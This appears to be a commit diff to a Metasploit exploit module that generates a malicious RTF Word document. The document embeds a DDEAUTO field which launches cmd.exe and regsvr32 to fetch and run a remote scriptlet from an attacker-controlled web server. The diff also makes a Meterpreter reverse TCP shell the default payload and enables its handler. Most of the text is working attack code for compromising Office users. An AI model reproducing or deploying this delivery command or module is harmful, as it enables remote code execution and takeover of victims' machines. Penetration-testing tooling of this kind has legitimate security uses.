Fix HANDLER + some default options!

Author: Austin

modules/exploits/windows/fileformat/office_dde_delivery.rb

@@ -17,8 +17,8 @@ def initialize(info  = {})
       'Name' => 'Microsoft Office DDE Payload Delivery',
       'Description' => %q{
         This module generates an DDE command to place within
-        a word document, that when executed, will retrieve a payload
-        from the webserver
+        a word document, that when executed, will retrieve a HTA payload
+        via HTTP from an web server.
       },
       'Author' => 'mumbai',
       'License' => MSF_LICENSE,
@@ -35,6 +35,14 @@ def initialize(info  = {})
           ['Microsoft Office', {} ],
         ],
       'DefaultTarget' => 0,
+      'Payload' => {
+        'DisableNops' => true
+      },
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => false,
+        'PAYLOAD' => 'windows/meterpreter/reverse_tcp',
+        'EXITFUNC' => 'thread'
+      }
     ))
     register_options([
       OptString.new("FILENAME", [true, "Filename to save as, or inject", "msf.rtf"]),
@@ -138,7 +146,7 @@ def create_rtf
     #
     header = retrieve_header(datastore['FILENAME'])
     field_class = '{\field{\*\fldinst {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid3807165  '
-    field_class << "DDEAUTO \"C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe /c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" \"#{datastore['MESSAGE']}\" }}"
+    field_class << "DDEAUTO C:\\\\\\\\Programs\\\\\\\\Microsoft\\\\\\\\Office\\\\\\\\MSword.exe\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\..\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe \"/c regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll\" }}"
     field_class << '{\fldrslt }}\sectd \ltrsect\linex0\endnhere\sectlinegrid360\sectdefaultcl\sftnbj {\rtlch\fcs1 \af31507 \ltrch\fcs0' + "\n"
     field_class << '\insrsid5790315' + "\n"
     field_class << '\par }'